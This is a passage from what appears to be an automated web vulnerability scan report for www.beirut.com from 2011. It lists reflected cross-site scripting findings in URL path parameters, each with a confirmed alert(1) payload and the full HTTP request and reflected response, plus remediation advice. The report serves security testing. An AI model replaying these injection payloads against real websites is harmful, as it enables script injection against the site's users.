GET /Shopping/Books-Music-Movies/05084418e9726'-alert(1)-'55efcd52eb5/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:23:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/05084418e9726'-alert(1)-'55efcd52eb5/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.754. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84b92'-alert(1)-'ad4a10db0ef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Music84b92'-alert(1)-'ad4a10db0ef/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:35:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Movies/05084418/Music84b92'-alert(1)-'ad4a10db0ef/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.755. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a784b'-alert(1)-'63148e25070 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies/05084418/Music/72a784b'-alert(1)-'63148e25070 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:40:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Music/72a784b'-alert(1)-'63148e25070';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.756. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e398c'-alert(1)-'594e82ce06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinge398c'-alert(1)-'594e82ce06/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinge398c'-alert(1)-'594e82ce06/Clothing-Accessories';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.757. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1819f"><a>b044d9257ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1819f"><a>b044d9257ad/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1819f"><a>b044d9257ad">
...[SNIP]...

4.758. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c583c'-alert(1)-'9a5270b3338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesc583c'-alert(1)-'9a5270b3338/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessoriesc583c'-alert(1)-'9a5270b3338';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.759. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7639c<script>alert(1)</script>eedd98e9c32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories7639c<script>alert(1)</script>eedd98e9c32/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories7639c<script>alert(1)</script>eedd98e9c32 <a href="#" id="backlink">
...[SNIP]...

4.760. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf2d'-alert(1)-'a77b80a9f16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingacf2d'-alert(1)-'a77b80a9f16/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shoppingacf2d'-alert(1)-'a77b80a9f16/Clothing-Accessories/194367784/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.761. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93695"><a>752e3b68b21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping93695"><a>752e3b68b21/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:14:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping93695"><a>752e3b68b21">
...[SNIP]...

4.762. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4efb1<script>alert(1)</script>270c69688f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4efb1<script>alert(1)</script>270c69688f2/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:45:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4efb1<script>alert(1)</script>270c69688f2 <a href="#" id="backlink">
...[SNIP]...

4.763. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5817'-alert(1)-'f1d9a9f0a05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesa5817'-alert(1)-'f1d9a9f0a05/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:44:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessoriesa5817'-alert(1)-'f1d9a9f0a05/194367784/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.764. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a731'-alert(1)-'b933d2c31c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/1943677849a731'-alert(1)-'b933d2c31c6/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/1943677849a731'-alert(1)-'b933d2c31c6/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.765. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566a'-alert(1)-'868cb594aa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Herb566a'-alert(1)-'868cb594aa2/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Herb566a'-alert(1)-'868cb594aa2/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.766. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1711c'-alert(1)-'6d4db64a6fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

